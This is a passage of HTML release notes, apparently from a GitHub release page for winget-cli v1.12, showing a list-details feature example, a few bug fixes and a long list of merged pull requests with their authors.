  winget [17.14.23]"><pre><span class="pl-k">&gt;</span> wingetdev list Microsoft.VisualStudio.<span class="pl-c1">2022.</span>Enterprise <span class="pl-k">--</span>details
Visual Studio Enterprise <span class="pl-c1">2022</span> [<span class="pl-k">Microsoft.VisualStudio.2022.Enterprise</span>]
Version: <span class="pl-c1">17.14</span>.<span class="pl-c1">21</span> (November <span class="pl-c1">2025</span>)
Publisher: Microsoft Corporation
Local Identifier: ARP\Machine\X86\875fed29
Product Code: 875fed29
Installer Category: exe
Installed Scope: Machine
Installed Location: C:\Program Files\Microsoft Visual Studio\<span class="pl-c1">2022</span>\Enterprise
Available Upgrades:
  winget [<span class="pl-c1">17.14</span>.<span class="pl-c1">23</span>]</pre></div>
<p>If sixels are enabled and supported by the terminal, an icon for the installed package will be shown.</p>
<p>To enable this feature, add the 'listDetails' experimental feature to your settings.</p>
<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content='"experimentalFeatures": {
    "listDetails": true
},'><pre class="notranslate"><code>"experimentalFeatures": {
    "listDetails": true
},
</code></pre></div>
<h2>Bug Fixes</h2>
<ul>
<li>Portable Packages now use the correct directory separators regardless of which convention is used in the manifest</li>
<li><code>--suppress-initial-details</code> now works with <code>winget configure test</code></li>
<li><code>--suppress-initial-details</code> no longer requires <code>--accept-configuration-agreements</code></li>
<li>Corrected property of <code>Font</code> experimental feature to accurately reflect <code>fonts</code> as the required setting value</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>Update the other TDBuild task by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3151652738" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5534" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5534/hovercard" href="https://github.com/microsoft/winget-cli/pull/5534">#5534</a></li>
<li>Use windows-latest agents in localization pipeline by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3154579970" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5538" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5538/hovercard" href="https://github.com/microsoft/winget-cli/pull/5538">#5538</a></li>
<li>Bump version to v1.12 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3151371086" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5532" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5532/hovercard" href="https://github.com/microsoft/winget-cli/pull/5532">#5532</a></li>
<li>Allow set foreground from PS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3154984365" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5541" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5541/hovercard" href="https://github.com/microsoft/winget-cli/pull/5541">#5541</a></li>
<li>Move to proper signal for dev/not-dev by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3169763143" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5552" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5552/hovercard" href="https://github.com/microsoft/winget-cli/pull/5552">#5552</a></li>
<li>Use SDK 26100 in CommonCore project by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3200120927" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5570" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5570/hovercard" href="https://github.com/microsoft/winget-cli/pull/5570">#5570</a></li>
<li>Repair Repair-WinGetPackageManager by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3197628230" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5568" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5568/hovercard" href="https://github.com/microsoft/winget-cli/pull/5568">#5568</a></li>
<li>Use cpprestsdk v2.10.18 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3197577111" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5567" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5567/hovercard" href="https://github.com/microsoft/winget-cli/pull/5567">#5567</a></li>
<li>Undefined-behaviour fix: safely call std::isspace in CompletionData by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mohiuddin-khan-shiam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mohiuddin-khan-shiam">@mohiuddin-khan-shiam</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3186146724" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5564" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5564/hovercard" href="https://github.com/microsoft/winget-cli/pull/5564">#5564</a></li>
<li>Add missing compilation flags for vcpkg ports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3224397023" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5587" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5587/hovercard" href="https://github.com/microsoft/winget-cli/pull/5587">#5587</a></li>
<li>Add more missing flags for vcpkg by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3237619990" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5592" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5592/hovercard" href="https://github.com/microsoft/winget-cli/pull/5592">#5592</a></li>
<li>Swallow provisioned package errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3240833652" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5595" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5595/hovercard" href="https://github.com/microsoft/winget-cli/pull/5595">#5595</a></li>
<li>Update detours vcpkg to use prior version by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3244916547" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5601" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5601/hovercard" href="https://github.com/microsoft/winget-cli/pull/5601">#5601</a></li>
<li>Remove TestRelease by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3253760151" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5613" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5613/hovercard" href="https://github.com/microsoft/winget-cli/pull/5613">#5613</a></li>
<li>Handle Byte Order Mark during validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3220923892" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5585" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5585/hovercard" href="https://github.com/microsoft/winget-cli/pull/5585">#5585</a></li>
<li>Initial MCP Server implementation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3250446710" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5610" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5610/hovercard" href="https://github.com/microsoft/winget-cli/pull/5610">#5610</a></li>
<li>Update release notes for BOM Handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3264891691" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5622" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5622/hovercard" href="https://github.com/microsoft/winget-cli/pull/5622">#5622</a></li>
<li>Don't build MCP for fuzzing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3267257548" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5625" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5625/hovercard" href="https://github.com/microsoft/winget-cli/pull/5625">#5625</a></li>
<li>Resolve nuget package graph for .NET projects together by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3274445183" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5627" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5627/hovercard" href="https://github.com/microsoft/winget-cli/pull/5627">#5627</a></li>
<li>Update to latest MCP nuget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3284768501" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5633" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5633/hovercard" href="https://github.com/microsoft/winget-cli/pull/5633">#5633</a></li>
<li>Update release notes to mention WinUI dependency change by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3315786475" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5656" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5656/hovercard" href="https://github.com/microsoft/winget-cli/pull/5656">#5656</a></li>
<li>Improve COM server quiescing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3311253541" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5652" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5652/hovercard" href="https://github.com/microsoft/winget-cli/pull/5652">#5652</a></li>
<li>Improve issue forms &amp; add corresponding label triggers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mdanish-kh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mdanish-kh">@mdanish-kh</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3319838802" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5661" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5661/hovercard" href="https://github.com/microsoft/winget-cli/pull/5661">#5661</a></li>
<li>Fix conflict with issue forms by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3320119960" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5663" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5663/hovercard" href="https://github.com/microsoft/winget-cli/pull/5663">#5663</a></li>
<li>Improve COM static store usage by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3346435528" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5680" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5680/hovercard" href="https://github.com/microsoft/winget-cli/pull/5680">#5680</a></li>
<li>Update schema to 1.12 with Font InstallerType by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3352674785" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5687" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5687/hovercard" href="https://github.com/microsoft/winget-cli/pull/5687">#5687</a></li>
<li>Download MS Store package for target OS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3353562454" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5689" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5689/hovercard" href="https://github.com/microsoft/winget-cli/pull/5689">#5689</a></li>
<li>Fixes for older OSes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3357315204" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5691" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5691/hovercard" href="https://github.com/microsoft/winget-cli/pull/5691">#5691</a></li>
<li>Add RestSource and tests for Manifest v1.12 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3360657592" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5695" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5695/hovercard" href="https://github.com/microsoft/winget-cli/pull/5695">#5695</a></li>
<li>Improve slow searches involving installed items by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3364993234" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5701" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5701/hovercard" href="https://github.com/microsoft/winget-cli/pull/5701">#5701</a></li>
<li>Shorter default installer log filename by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3368313385" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5705" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5705/hovercard" href="https://github.com/microsoft/winget-cli/pull/5705">#5705</a></li>
<li>Add the ARP correlation entry to the context for portable installs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3377690777" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5707" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5707/hovercard" href="https://github.com/microsoft/winget-cli/pull/5707">#5707</a></li>
<li>Fix two unrelated version issues by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3412285391" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5719" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5719/hovercard" href="https://github.com/microsoft/winget-cli/pull/5719">#5719</a></li>
<li>Heal tracking database if it can't open by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419506355" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5724" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5724/hovercard" href="https://github.com/microsoft/winget-cli/pull/5724">#5724</a></li>
<li>MS Store cert pinning updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3436228691" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5732" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5732/hovercard" href="https://github.com/microsoft/winget-cli/pull/5732">#5732</a></li>
<li>Update MCP GP name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3446264966" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5736" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5736/hovercard" href="https://github.com/microsoft/winget-cli/pull/5736">#5736</a></li>
<li>Add workflow for automatic issue deduplication by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cinnamon-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cinnamon-msft">@cinnamon-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3450208289" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5738" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5738/hovercard" href="https://github.com/microsoft/winget-cli/pull/5738">#5738</a></li>
<li>moving workflow to parent by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/denelon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/denelon">@denelon</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3450382277" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5740" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5740/hovercard" href="https://github.com/microsoft/winget-cli/pull/5740">#5740</a></li>
<li>Cache information responses from REST sources by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3424158468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5726" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5726/hovercard" href="https://github.com/microsoft/winget-cli/pull/5726">#5726</a></li>
<li>Shared build props by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3458857805" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5749" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5749/hovercard" href="https://github.com/microsoft/winget-cli/pull/5749">#5749</a></li>
<li>Improve shared props layout by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3459246168" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5751" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5751/hovercard" href="https://github.com/microsoft/winget-cli/pull/5751">#5751</a></li>
<li>Fix portable path removal on upgrade by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3466370013" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5756" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5756/hovercard" href="https://github.com/microsoft/winget-cli/pull/5756">#5756</a></li>
<li>Minor update to release notes for v1.12 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3470589894" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5761" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5761/hovercard" href="https://github.com/microsoft/winget-cli/pull/5761">#5761</a></li>
<li>Font Install, Uninstall, additional Font List by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3187280381" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5566" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5566/hovercard" href="https://github.com/microsoft/winget-cli/pull/5566">#5566</a></li>
<li>Fix install source and final progress by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3474726946" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5764" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5764/hovercard" href="https://github.com/microsoft/winget-cli/pull/5764">#5764</a></li>
<li>Use winrt for time conversion by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3474607043" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5763" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5763/hovercard" href="https://github.com/microsoft/winget-cli/pull/5763">#5763</a></li>
<li>Change label_as_duplicate to false in workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3488439814" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5773" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5773/hovercard" href="https://github.com/microsoft/winget-cli/pull/5773">#5773</a></li>
<li>Remove openssl from sfsclient cgmanifest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3489513239" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5775" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5775/hovercard" href="https://github.com/microsoft/winget-cli/pull/5775">#5775</a></li>
<li>Add admin check to uninstall of machine font by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3493108538" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5779" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5779/hovercard" href="https://github.com/microsoft/winget-cli/pull/5779">#5779</a></li>
<li>Add Font source group policy support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3302306142" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5646" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5646/hovercard" href="https://github.com/microsoft/winget-cli/pull/5646">#5646</a></li>
